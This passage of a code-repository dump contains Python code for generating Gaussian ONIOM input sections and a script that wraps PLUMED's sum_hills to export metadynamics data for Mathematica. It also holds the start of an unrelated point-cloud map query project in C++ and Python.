Gaussian jobs using Amber MM and\n HardFirst, SoftFirst, or SoftOnly\n \"\"\"\n # This doesn't seem perfect: the selection functions don't\n # really work because (for example) a single bond_type might\n # be used for different atom types, which is what is\n # currently assumed. Need to find a way to either find all\n # atom types for which it should be used (possibly using\n # wildcards), or just iterate over all bonds/angles/dihedrals\n # instead of iterating over *_types.\n log.debug('Creating params_section in OniomStructure')\n self._check_structure_universe_compatibility()\n lines = list()\n # get types based on if only_unique_types is True or False\n types = self._types_dict[self.only_unique_types]\n if self.only_used_terms and self.atoms_used_indices is not None:\n types = self._remove_unused_terms(types)\n lines.append('! Van der Waals parameters\\n!\\n')\n atom_types = self._get_atom_types()\n param_lines = set()\n for at in atom_types:\n param_lines.add(self._make_atomtype_line(at))\n lines += list(param_lines)\n lines.append('! Stretch parameters\\n!\\n')\n bond_types = types['bonds']\n param_lines = set()\n for bond in bond_types:\n param_lines.add(self._make_bondtype_line(bond))\n lines += list(param_lines)\n lines.append('! Bend parameters\\n!\\n')\n angle_types = types['angles']\n param_lines = set()\n for angle in angle_types:\n param_lines.add(self._make_angletype_line(angle))\n lines += list(param_lines)\n lines.append('! Dihedral parameters\\n!\\n')\n dihedral_types = types['dihedrals']\n param_lines = set()\n for dihed in dihedral_types:\n param_lines.add(self._make_dihedraltype_line(dihed))\n lines += list(param_lines)\n lines.append('! Improper dihedral parameters\\n!\\n')\n improper_types = types['impropers']\n param_lines = set()\n for dihed in improper_types:\n param_lines.add(self._make_impropertype_line(dihed))\n lines += list(param_lines)\n return lines\n\n def _get_atom_types(self,) -> set:\n atom_types = set()\n for atom in self.structure.atoms:\n atom_types.add(atom.atom_type)\n return atom_types\n\n @staticmethod\n def _make_atomtype_line(atom_type) -> str:\n sigma = atom_type.urmin\n epsilon = atom_type.uepsilon\n sigma = sigma.value_in_unit(parmed.unit.angstrom)\n epsilon = epsilon.value_in_unit(parmed.unit.kilocalorie_per_mole)\n return f'VDW {atom_type.name: <2} {sigma:4f} {epsilon:4f}\\n'\n\n @staticmethod\n def _get_types(instances, types) -> List:\n instance_types = list()\n for _type in types:\n for inst in instances:\n if inst.type == _type:\n instance_types.append(inst)\n break\n return instance_types\n\n def _get_bond_types_uniq(self, ) -> List:\n return self._get_types(self.structure.bonds, self.structure.bond_types)\n\n def _get_bond_types_nu(self) -> List:\n return self.structure.bonds\n\n @staticmethod\n def _make_bondtype_line(bond: parmed.topologyobjects.Bond) -> str:\n a1, a2 = bond.atom1.type, bond.atom2.type\n k = bond.type.uk.value_in_unit(parmed.unit.kilocalorie_per_mole /\n parmed.unit.angstrom ** 2)\n req = bond.type.ureq.value_in_unit(parmed.unit.angstrom)\n return f'HrmStr1 {a1:2} {a2:2} {k: <5.1f} {req: <5.3f}\\n'\n\n def _get_angle_types_uniq(self, ) -> List:\n return self._get_types(self.structure.angles,\n self.structure.angle_types)\n\n def _get_angle_types_nu(self) -> List:\n return self.structure.angles\n\n @staticmethod\n def _make_angletype_line(angle: parmed.topologyobjects.Angle) -> str:\n a1, a2, a3 = angle.atom1.type, angle.atom2.type, angle.atom3.type\n k = angle.type.uk.value_in_unit(parmed.unit.kilocalorie_per_mole /\n parmed.unit.radian ** 2)\n thetaeq = angle.type.utheteq.value_in_unit(parmed.unit.degree)\n return f'HrmBnd1 {a1:2} {a2:2} {a3:2} {k: >5.1f} {thetaeq:6.2f}\\n'\n\n def _get_improper_types_uniq(self, ) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n return self._get_types(self.structure.dihedrals,\n self.structure.dihedral_types)\n\n def _get_improper_types_nu(self) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n return self.structure.dihedrals\n\n @staticmethod\n def _make_impropertype_line(dihed: parmed.topologyobjects.Dihedral\n ) -> str:\n a1, a2, a3, a4 = (dihed.atom1.type, dihed.atom2.type,\n dihed.atom3.type, dihed.atom4.type)\n phi_k = dihed.type.uphi_k.value_in_unit(\n parmed.unit.kilocalorie_per_mole)\n phase = dihed.type.uphase.value_in_unit(parmed.unit.degree)\n per = dihed.type.per\n return (f'ImpTrs {a1:2} {a2:2} {a3:2} {a4:2} '\n f'{phi_k: >5.1f} {phase:5.1f} {per:3.1f}\\n')\n\n def _get_dihedral_types_uniq(self, ) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n # and the dihedrals get stored as Ryckaert-Bellemans\n # dihedrals (function 3)\n return self._get_types(self.structure.rb_torsions,\n self.structure.rb_torsion_types)\n\n def _get_dihedral_types_nu(self) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n # and the dihedrals get stored as Ryckaert-Bellemans\n # dihedrals (function 3)\n return self.structure.rb_torsions\n\n @staticmethod\n def _make_dihedraltype_line(dihed: parmed.topologyobjects.Dihedral\n ) -> str:\n a1, a2, a3, a4 = (dihed.atom1.type, dihed.atom2.type,\n dihed.atom3.type, dihed.atom4.type)\n dtl = parmed.DihedralTypeList.from_rbtorsion(dihed.type)\n phases = [0] * 4\n phis = [0.] * 4\n for dihed_type in dtl:\n phi_k = dihed_type.uphi_k.value_in_unit(\n parmed.unit.kilocalorie_per_mole)\n phase = dihed_type.uphase.value_in_unit(parmed.unit.degree)\n per = dihed_type.per\n phases[per], phis[per] = phase, phi_k\n output = (f'AmbTrs {a1:2} {a2:2} {a3:2} {a4:2} ' +\n ' '.join([f'{i: >3d}' for i in phases]) + ' ' +\n ' '.join([f'{i: >6.3f}' for i in phis]) +\n ' -1.0\\n')\n return output\n\n def _remove_unused_terms(self, types) -> Dict[str, list]:\n atoms_used = np.array(self.structure.atoms)[self.atoms_used_indices]\n n_atoms_by_type = {'bonds': 2, 'angles': 3, 'dihedrals': 4,\n 'impropers': 4}\n for key in types:\n n_atoms = n_atoms_by_type[key]\n return_params = []\n input_params = types[key]\n for param in input_params:\n for i in range(n_atoms):\n i += 1\n if not getattr(param, f'atom{i}') in atoms_used:\n break\n else:\n return_params.append(param)\n types[key] = return_params\n return types\n\n def _check_structure_universe_compatibility(self):\n log.debug('Checking compatibility of this structure with given args')\n if self.atoms_used_indices is None:\n return None\n max_ind = max(self.atoms_used_indices)\n try:\n self.structure.atoms[max_ind]\n return None\n except IndexError:\n raise ValueError('given atoms_used_indices requests atoms that '\n 'are not in this structure. Check to make sure '\n 'this Structure is compatible with the Universe.')\n\n\nclass OniomUniverse(object):\n \"\"\"\n Object to help easily create Gaussian ONIOM input sections\n\n\n There are a few ways to instantiate this object.\n First, it can be instantiated with an existing MDAnalysis Universe\n instance and an existing parmed Structure instance:\n\n >>> univ = MDAnalysis.Universe('geom.pdb', 'traj.xtc')\n >>> structure = parmed.load_file('topology.top')\n >>> ou = OniomUniverse(univ=univ, structure=structure)\n\n Alternatively, the Universe and/or Structure can be instantiated here:\n\n >>> ou = OniomUniverse(univ_args=['geom.pdb', 'traj.xtc'], \\\n structure_file='topology.top')\n\n Any combination of these methods can also be used.\n\n Also, `high_select` and `low_select` need to be provided during or\n after instantiation before accessing the Gaussian input sections:\n\n >>> ou = OniomUniverse(univ=univ, structure=structure, \\\n high_select='resid 2-3')\n >>> ou.low_select = 'protein or byres around 5 resid 2-3'\n\n Then, the Gaussian input sections can be created:\n\n >>> mol_sec = ou.molecule_section\n >>> bond_sec = ou.bonds_section\n >>> param_sec = ou.params_section\n\n Note, if you do not need the parameter section (e.g., only using\n already included AMBER atom types), the structure or structure files\n need not be specified. That portion is optional, and `molecule_section` and\n `params_section` do not depend on the structure.\n\n The interfaces between high and low are not treated specially, so link\n atoms will need to be manually treated. That can be done after writing\n to an input file, or using something like::\n\n interface_atom = univ.select_atoms('bynum 88')\n interface_atom_index = ou.atom_to_line_num[interface_atom] - 1\n # (because the dict gives a (Gaussian) 1-based index)\n interface_atom_line = mol_sec[interface_atom_index][:-2]+' H-H1-0.1\\\\n'\n # (remove newline, add link atom definition and newline)\n mol_sec[interface_atom_index] = interface_atom_line\n\n \"\"\"\n\n def __init__(self, univ: MDAnalysis.Universe = None,\n structure: parmed.Structure = None,\n high_select: str = None,\n low_select: str = None,\n overlap_okay: bool = False,\n univ_args=None, univ_kwargs=None,\n structure_file=None,\n structure_args=None, structure_kwargs=None,\n freeze_dict: dict = None):\n \"\"\"\n Initialize OniomUniverse to create Gaussian ONIOM input sections\n\n :param univ: Universe with the geometry and bonding information for the\n system of interest. Note, the geometry must include bonding\n information or MDAnalysis will have to be told to guess them:\n https://www.mdanalysis.org/docs/documentation_pages/topology/guessers.html#MDAnalysis.topology.guessers.guess_bonds\n :param structure: Structure with atom types, bonds, angles,\n etc. Note, this is only currently written to work with AMBER (or\n really GAFF as made by Antechamber/AcPype), and it is unclear\n how it will work for other force fields or implementations.\n :param high_select: Selection string for the atoms to be included in the\n \"high\" calculation\n :param low_select: Selection string for the atoms to be included in the\n \"low\" calculation\n :param overlap_okay: If True, overlap between the high and low\n selections will be ignored and anything in the overlap will be\n included in the \"high\" region\n :param univ_args: arguments to be provided to instantiate the Universe\n :param univ_kwargs: keyword arguments to be provided to instantiate\n the Universe\n :param structure_file: filename (first argument) to be provided to\n instantiate the Structure\n :param structure_args: arguments to be provided to instantiate the\n Structure\n :param structure_kwargs: keyword arguments to be provided to instantiate\n the Structure\n :param freeze_dict: mapping from levels ('H' and 'L') to freeze\n commands (0 for unfrozen, -1 for frozen).\n Default is `{'H': 0, 'L': -1}`\n \"\"\"\n log.debug('Initializing OniomUniverse object')\n univ_args = list() if univ_args is None else univ_args\n # probably invalid anyway because Universe can't be kwarg only\n univ_kwargs = dict() if univ_kwargs is None else univ_kwargs\n if univ is None:\n self.universe = MDAnalysis.Universe(*univ_args, **univ_kwargs)\n else:\n self.universe = univ\n self._check_universe()\n try:\n self.oniom_structure = OniomStructure(\n structure=structure,\n structure_file=structure_file,\n structure_args=structure_args,\n structure_kwargs=structure_kwargs)\n except NoStructureException:\n self.oniom_structure = None\n self.high_select = high_select\n self.low_select = low_select\n self.overlap_okay = overlap_okay\n self.atom_to_line_num = dict()\n self.n_atoms_in_input = 0\n self.freeze_dict = ({'H': 0, 'L': -1} if freeze_dict is None\n else freeze_dict)\n\n @property\n def molecule_section(self,) -> List[str]:\n \"\"\"\n Molecule specification lines for ONIOM calculation\n\n This defines a dict mapping `Atom`s to atom number (line number in\n input) as `self.atom_to_line_number`, and number of atoms included in\n the input as `self.n_atoms_in_input`.\n\n :return: The lines to be written into the input\n \"\"\"\n log.debug('Creating molecule section for OniomUniverse')\n if self.high_select is None or self.low_select is None:\n raise self.SelectionError('Both `high_select` and `low_select` '\n 'must be specified')\n high_atoms = self.universe.select_atoms(self.high_select)\n low_atoms = self.universe.select_atoms(self.low_select)\n n_atoms_in_both = high_atoms.intersection(low_atoms).n_atoms\n if n_atoms_in_both and not self.overlap_okay:\n log.error('High and low selections are not mutually exclusive and '\n 'overlap_okay is not True')\n raise ValueError('The selections are not mutually exclusive. '\n 'Make mutually exclusive or set overlap_okay=True')\n atoms_used_indices = []\n lines = []\n line_num = 0\n for atom in self.universe.atoms:\n if atom in high_atoms:\n level = 'H'\n elif atom in low_atoms:\n level = 'L'\n else:\n continue\n line_num += 1\n lines.append(self._make_atom_line(atom=atom, level=level,))\n atoms_used_indices.append(atom.index)\n self.atom_to_line_num[atom] = line_num\n sel_n_atoms = (high_atoms.n_atoms + low_atoms.n_atoms - n_atoms_in_both)\n if line_num != sel_n_atoms:\n mes = ('Number of lines and n_atoms in selections differ '\n f'({line_num} and {sel_n_atoms})')\n log.error(mes)\n raise ValueError(mes)\n self.n_atoms_in_input = sel_n_atoms\n if self.oniom_structure is not None:\n self.oniom_structure.atoms_used_indices = atoms_used_indices\n return lines\n\n @property\n def bonds_section(self, ) -> List[str]:\n \"\"\"\n Bond specifications for a Gaussian job with `geom=connectivity`\n\n :return: The lines to be written in the input after the molecule\n specification\n \"\"\"\n log.debug('Creating bonds section for OniomUniverse')\n if self.n_atoms_in_input == 0:\n log.error('No atoms yet picked for this OniomUniverse')\n raise ValueError('No atoms have been put into the molecule '\n 'specification yet so the bonds cannnot yet be '\n 'defined. Either run `molecule_section` '\n 'first or check your selections.')\n atln = self.atom_to_line_num\n bond_dict = collections.defaultdict(list)\n for bond in self.universe.bonds:\n a1, a2 = bond.atoms\n try:\n bond_dict[atln[a1]].append(f'{atln[a2]} 1.0')\n except KeyError:\n continue\n lines = []\n for i in range(self.n_atoms_in_input):\n i += 1 # use 1-based indexing\n bonds = ' '.join(bond_dict[i])\n lines.append(f'{i} {bonds}\\n')\n return lines\n\n @property\n def params_section(self):\n if self.oniom_structure is None:\n log.warning('No structure for this OniomUniverse but '\n 'params_section was accessed')\n raise NoStructureException('No Structure given for this '\n 'OniomUniverse')\n else:\n return self.oniom_structure.params_section\n\n params_section.__doc__ = OniomStructure.params_section.__doc__\n\n _re_element = re.compile(r'[A-Z][a-z]?')\n\n def _get_elem(self, atom: MDAnalysis.core.groups.Atom) -> str:\n \"\"\"\n Get element name from Atom object\n\n This counts on any multi-letter element being named as Ca (capital\n followed by lower case). Also, single-letter element names must be\n capitalized and not followed by a lower-case letter.\n\n An alternative method could be a mapping from masses to elements, or\n use the parmed Structure which knows element information.\n \"\"\"\n elem_match = self._re_element.match(atom.name)\n if elem_match:\n return elem_match.group(0)\n else:\n mes = f'Could not find element for atom {atom}'\n log.error(mes)\n raise ValueError(mes)\n\n def _make_atom_line(self, atom: MDAnalysis.core.groups.Atom,\n level: str,) -> str:\n elem = self._get_elem(atom)\n line = (f'{elem}-'\n f'{atom.type}-'\n f'{atom.charge:3f} {self.freeze_dict[level]} '\n f'{atom.position[0]:4f} '\n f'{atom.position[1]:4f} '\n f'{atom.position[2]:4f} {level}\\n')\n return line\n\n def _check_universe(self):\n log.debug('Checking attributes of this Universe')\n if not hasattr(self.universe, 'bonds'):\n mes = ('This Universe does not have defined bonds. Try '\n 'an input with defined bonds or try `guess_bonds=True`.')\n log.error(mes)\n raise ValueError(mes)\n if not hasattr(self.universe.atoms[0], 'charge'):\n mes = ('The atoms in this Universe do not have charge defined.'\n 'Try a format with defined charge.')\n log.error(mes)\n raise ValueError(mes)\n if not hasattr(self.universe.atoms[0], 'position'):\n mes = ('The atoms in this Universe do not have position defined.'\n 'Try a format with defined positions or also load in a '\n 'trajectory file (can just be a pdb or xyz file).')\n log.error(mes)\n raise ValueError(mes)\n\n class SelectionError(ValueError):\n pass\n"
},
{
"alpha_fraction": 0.7981510162353516,
"alphanum_fraction": 0.7981510162353516,
"avg_line_length": 48.92307662963867,
"blob_id": "51c6458af2f171531734256aba5d576504df6302",
"content_id": "60367c5ee45f8acea312733a9821062cbf97ec68",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 649,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 13,
"path": "/README.md",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "This repository contains some scripts and a package related to running and \nanalyzing Gaussian calculations (and possibly a little for Q-Chem). \nThere is also some older code for looking at the convergence of metadynamics\ncalculations run with PLUMED.\n\nTwo dependencies of gautools that might be harder to find and will likely not\ninstall automatically are:\n * [ParaTemp](https://github.com/theavey/ParaTemp)\n * [thtools](https://github.com/theavey/thtools)\n\nThere was previously a script to help setup parallel tempering calculations,\nbut that was removed because a newer version is available in \n[ParaTemp](https://github.com/theavey/ParaTemp).\n"
},
{
"alpha_fraction": 0.516644299030304,
"alphanum_fraction": 0.5204607844352722,
"avg_line_length": 42.94099426269531,
"blob_id": "1f03e8f69da6c6b1be39ef75c4241f3b16688707",
"content_id": "411625e4cc1dd6ff961f5a9ebc07b8c240d62fb7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14149,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 322,
"path": "/sumHills/interfaceToSumHills.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# This is written to work with python 3.4 because it should be good to\n# be working on the newest version of python.\n\nimport glob\nimport argparse\nimport subprocess\nimport readline\nimport os\nimport shutil\nfrom datetime import datetime\n\n__version__ = '0.2.2'\n\nparser = argparse.ArgumentParser(description='Use PLUMED utility to sum '\n 'HILLS and then put into '\n 'Mathematica friendly format')\nparser.add_argument('-H', '--hills', default='HILLS',\n help='name of the HILLS file')\nparser.add_argument('-s', '--stride', default=10000,\n help='specify the stride for integrating '\n 'hills file (default 10000)')\nparser.add_argument('-a', '--ask', action='store_true',\n help='Flag for specifying that it should ask for min, '\n 'max, bin, and spacing')\nparser.add_argument('-v', '--verbose', action='store_true',\n help='make script more verbose')\nparser.add_argument('-f', '--folder', default='SumHills',\n help='Folder in which this will be run. Can be '\n 'deleted automatically using -c 3.')\nparser.add_argument('-t', '--temp_file', default='temp_data_file.m',\n help='File in which to store all the data')\nparser.add_argument('-n', '--var_name', default='summedHills',\n help='Name of variable to be assigned for Mathematica')\nparser.add_argument('-T', '--template', default='sumHillsTempl.m',\n help='Output template file')\nparser.add_argument('-o', '--output_name', default='summedHills.m',\n help='Name of the file to be output')\nparser.add_argument('-e', '--exists', action='store_true',\n help='Use this argument if the fes data already exists')\nparser.add_argument('-c', '--clean', type=int, default=2,\n help='Argument for how much to clean up\\n'\n '0 does not delete or move anything\\n'\n '>0 moves output to starting folder '\n 'and deletes copy of HILLS file\\n'\n '>1 deletes temp data file\\n'\n '>2 deletes temp folder and contents\\n'\n 'default is 2')\nparser.add_argument('--version', action='version',\n version='%(prog)s v{}'.format(__version__))\nargs = parser.parse_args()\n\n\n# An input function that can prefill in the text entry\ndef rlinput(prompt, prefill=''):\n readline.set_startup_hook(lambda: readline.insert_text(prefill))\n try:\n # This was raw_input, but that's deprecated in py3\n return input(prompt)\n finally:\n readline.set_startup_hook()\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\ndef run_plumed_sum_hills():\n \"\"\"This function takes no arguments and returns nothing.\n Using the command line values stored in args, it will run the PLUMED\n sum_hills utility.\"\"\"\n command_line = ['mpirun', '-n', '1', 'plumed', 'sum_hills']\n command_line += ['--hills', args.hills]\n if args.verbose:\n print('hills file name is {}'.format(args.hills))\n command_line += ['--stride', str(args.stride)]\n if args.verbose:\n print('data output stride is {}'.format(args.stride))\n if args.ask:\n print('length of min, max, bin, and spacing should be equal '\n 'to number of CVs\\n'\n 'For 2 CVs for example, format as \"-pi,-pi\"')\n minim = str(rlinput('min = '))\n maxim = str(rlinput('max = '))\n spacing = str(rlinput('grid spacing = '))\n bins = str(rlinput('num of bins = '))\n # Check input arguments for PLUMED sum_hills\n if bins:\n if minim or maxim:\n if not (minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n else:\n if spacing:\n if minim or maxim:\n if not(minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n else:\n if minim or maxim:\n if not(minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n spacing = rlinput('grid spacing = ')\n bins = rlinput('num of bins = ')\n # Put these arguments into the list of arguments to be submitted\n if bins:\n command_line += ['--bin', bins]\n if args.verbose:\n print('number of bins is {}'.format(bins))\n if spacing:\n command_line += ['--spacing', spacing]\n if args.verbose:\n print('grid spacing: {}'.format(spacing))\n if minim or maxim:\n if minim and maxim:\n command_line += ['--min', str(minim),\n '--max', str(maxim)]\n if args.verbose:\n print('min: {}, max: {}'.format(minim, maxim))\n else:\n raise ValueError('Need to have both min and max!')\n command_line_str = ' '.join(command_line)\n print('command line argument is:\\n{}'.format(command_line_str))\n print('Running PLUMED sum_hills utility...')\n # Run the PLUMED sum_hills utility and save/print the output as it comes\n with open('plumed_output.log', 'w') as log_file:\n with subprocess.Popen(command_line,\n stdout=subprocess.PIPE, bufsize=1,\n universal_newlines=True) as proc:\n for line in proc.stdout:\n log_file.write(line)\n if args.verbose:\n print(line, end='')\n #if proc.returncode != 0:\n # todo check to make sure it ran okay? maybe subprocess does that already\n print('Done running PLUMED sum_hills utility')\n\n\ndef setup_folder():\n \"\"\"This function takes no arguments and returns nothing.\n It will create a folder for making all this data, and\n it will copy the specified hills file there.\"\"\"\n working_folder = args.folder\n # Make the working folder, don't raise error if it already exists\n os.makedirs(working_folder, exist_ok=True)\n copyout = shutil.copy(args.hills, working_folder)\n if args.verbose:\n print('HILLS file copied to {}'.format(copyout))\n os.chdir(working_folder)\n\n\ndef read_plumed_stuff():\n \"\"\"This function takes no arguments and returns nothing.\n It will save the output data from plumed to a formatted\n temporary file that can then be read to put the data\n into the file that Mathematica can read.\n If defines the global variable num_of_cvs.\"\"\"\n global num_of_cvs, formatted_data, fes_file_names\n print('Reading PLUMED output files')\n fes_file_names = glob.glob('fes*.dat')\n # Make sure the list is in the proper order:\n fes_file_names.sort() # sort files alphanumerically\n fes_file_names.sort(key=len) # sort files by length\n # Find number of CVs:\n # At least in the current implementation of PLUMED, the output is\n # the list of CV coordinates, then the height there, then the\n # derivative with respect to each of the CVs, hence the\n # (number of fields - 1) / 2.\n with open(fes_file_names[0], 'r') as file:\n for line in file:\n if line.startswith('#'):\n continue\n num_fields = len(line.split())\n num_of_cvs = (num_fields - 1) / 2.\n if num_of_cvs.is_integer():\n num_of_cvs = int(num_of_cvs)\n else:\n print('number of CVs found to be {}!'.format(num_of_cvs))\n num_of_cvs = rlinput('Real number of CVs = ',\n str(int(num_of_cvs)))\n break\n all_data = []\n for file in fes_file_names:\n f_data = []\n if args.verbose:\n print('Reading file {}'.format(file))\n with open(file, 'r') as crf:\n l_data = []\n for line in crf:\n if line.startswith('#'):\n continue\n try:\n if is_number(line.split()[0]):\n l_data += [', '.join(line.split()[0:(num_of_cvs+1)])]\n except IndexError:\n # Blank lines in files have length 0\n continue\n f_data += ['},\\n{'.join(l_data)]\n all_data += f_data\n formatted_data = '{{{' + '}},\\n{{'.join(all_data) + '}}}\\n\\n'\n with open(args.temp_file, 'w') as tf:\n tf.write(formatted_data)\n print('Done reading PLUMED output data')\n\n\ndef data_into_mfile():\n \"\"\"This function takes no arguments and returns nothing.\n It will take data saved to a temporary file from read_plumed_stuff\n and put it into the template .m file so that it can be read into\n Mathematica\"\"\"\n print('Putting data into output file...')\n about_content = []\n about_content += ['\"Number of CVs: {}\"'.format(num_of_cvs)]\n about_content += ['\"Number of points per time chunk: '\n '{}\"'.format(args.stride)]\n about_content += ['\"Originally processed on {}\"'.format(datetime.now())]\n about_content += ['\"Processed with '\n '{} v{}\"'.format(os.path.basename(__file__),\n __version__)]\n about = '{' + ', '.join(about_content) + '}'\n replacements = dict(varname=args.var_name, data=formatted_data,\n numcvs=num_of_cvs, stride=args.stride,\n about=about)\n # Below shouldn't be needed, but leaving for backward compatibility.\n replacements['spacing'] = '(Print[\"getGridSize not currently ' \\\n 'defined\"]; $Failed)'\n print(replacements.keys())\n with open(args.template, 'r') as template, \\\n open(args.output_name, 'w') as output:\n for line in template:\n if line.startswith('#'):\n # Remove the '#'\n line = line[1:]\n try:\n # Unpack the dict, then do the replacements\n output.write(line.format(**replacements))\n except KeyError as e:\n print('Error! Key {} not found!'.format(e))\n choice = input('(a)bort or (s)kip? ')\n if choice in 'abort':\n raise e\n if choice in 'skip':\n continue\n else:\n output.write(line)\n print('Output saved as {}'.format(args.output_name))\n\n\ndef clean_up():\n \"\"\"This function takes no arguments and returns nothing.\n It will ask if the temp data should be deleted, and if so, will clean\n it all up. It can also move the output file back to the original\n directory.\n Default is to move output file to the starting directory, removes\n the HILLS file if copied, and removes the temp data file. Use -c\n argument to change this behavior.\n \"\"\"\n print('Cleaning up...')\n if args.clean > 0:\n if args.verbose:\n print('Copying {} to {}...'.format(args.output_name, current_dir))\n shutil.copy(args.output_name, current_dir)\n if not args.exists:\n # If HILLS file was copied (only true if args.exists is false)\n # delete the copy\n if args.verbose:\n print('Removing {}...'.format(args.hills))\n os.remove(args.hills)\n if args.clean > 1:\n if args.verbose:\n print('Removing {}...'.format(args.temp_file))\n os.remove(args.temp_file)\n if args.clean > 2:\n temp_folder = current_dir + '/' + args.folder\n if args.verbose:\n print('Removing {} and contents...'.format(temp_folder))\n shutil.rmtree(temp_folder)\n print('Done cleaning up files/folders.')\n\n\ncurrent_dir = os.getcwd()\nif not args.exists:\n setup_folder()\n run_plumed_sum_hills()\nread_plumed_stuff()\ndata_into_mfile()\nclean_up()\nprint('Done!')\n"
}
] | 11 |
genmao/pcdquery | https://github.com/genmao/pcdquery | 40b5269df6d6dc70b1fa9e1c58837224f183d9d7 | ef1b4bc1b8624693370f18caaada0cb28dafff81 | ac893c62ba16eae101f40abeebf4f5effa42443b | refs/heads/master | 2021-01-20T03:15:03.579796 | 2017-04-26T19:14:55 | 2017-04-26T19:14:55 | 89,517,006 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4793926179409027,
"alphanum_fraction": 0.5206073522567749,
"avg_line_length": 22.049999237060547,
"blob_id": "da5130ef7a579edda54bc2b4368704570b2160d0",
"content_id": "9f55de7b050beabfbb4963e939636cad437e1865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 20,
"path": "/query_allin.cpp",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "#include \"findPCD_allin.h\"\n#include <vector>\n\n/* This is a test. */\n\nint main(){\n double lon = -117.1279;\n double lat = 32.7729;\n std::vector<double> result;\n result = pcd_finder(lon, lat, 1);\n if (result.empty()){\n std::cout << result.size() << std::endl;\n return 0;\n }\n for(int i =0; i < 10; i++){\n std::cout << std::endl << result[i] << std::endl;\n }\n std::cout << result.size() << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.7305936217308044,
"alphanum_fraction": 0.7579908967018127,
"avg_line_length": 47.55555725097656,
"blob_id": "a0d41ef85e3b0fd0ebd8425ce9d818b2915264ec",
"content_id": "6fab6eb48f433df91017d493744c7dac7798ebf0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 9,
"path": "/README.md",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "# pcdquery\n\nThe function pcd_finding is in findPCD_allin.h. \n\nInclude findPCD_allin.h, then call std::vector<double> pcd_finder(double lon, double lat, int query_size). \n\nInput is longitude, latitude, the radius of searching field in terms of num of blocks(1 indicates only 1 block, 2 indicates nearby 9 blocks, 3 indicates nearby 25 blocks, etc.). Each block is of 20*20 m^2. \n\nfindPCD_allin.cpp is a demo to call pcd_finding function. \n"
},
{
"alpha_fraction": 0.5476664304733276,
"alphanum_fraction": 0.5834992527961731,
"avg_line_length": 36.66666793823242,
"blob_id": "302f54c04a4ed85fa699b126e3c557d7a5647fb7",
"content_id": "b86aa0d99c543230ffaeefbee68fa6c48bd6897f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4521,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 120,
"path": "/loadPCD_allin.py",
"repo_name": "genmao/pcdquery",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pypcd\nimport datetime\nimport os\nimport math\nfrom struct import Struct\n\n\ndef write_records(records, format, f):\n \"\"\"\n Write a sequence of tuples to a binary file of structures.\n \"\"\"\n record_struct = Struct(format)\n for r in records:\n f.write(record_struct.pack(*r))\n\n'''\ndef pointAssociateToMap(pi, transformTobeMapped):\n x1 = math.cos(transformTobeMapped[2]) * pi[0] - math.sin(transformTobeMapped[2]) * pi[1]\n y1 = math.sin(transformTobeMapped[2]) * pi[0] + math.cos(transformTobeMapped[2]) * pi[1]\n z1 = pi[2]\n\n x2 = x1\n y2 = math.cos(transformTobeMapped[0]) * y1 - math.sin(transformTobeMapped[0]) * z1\n z2 = math.sin(transformTobeMapped[0]) * y1 + math.cos(transformTobeMapped[0]) * z1\n\n t1 = math.cos(transformTobeMapped[1]) * x2 + math.sin(transformTobeMapped[1]) * z2 + transformTobeMapped[3]\n t2 = y2 + transformTobeMapped[4]\n t3 = -math.sin(transformTobeMapped[1]) * x2 + math.cos(transformTobeMapped[1]) * z2 + transformTobeMapped[5]\n t4 = pi[3]\n tmp = [t1, t2, t3, t4]\n return tmp\n'''\n\n\n# load_global_map(f, db, drop) reads pcd data in f (*.pcd) into Mongodb collection db.offlinemap\n# The format is as {\"loc\": [x, z], \"y\": [y]}\n# By default, when drop==False, it would append new data without remove old points.\n# To remove old data in db.offline, please set drop=True\ndef load_global_map(filelist):\n start = datetime.datetime.now()\n point_to_block = {}\n block_size = 20\n count = 0\n for f in filelist:\n count += 1\n print count\n # print \"Reading 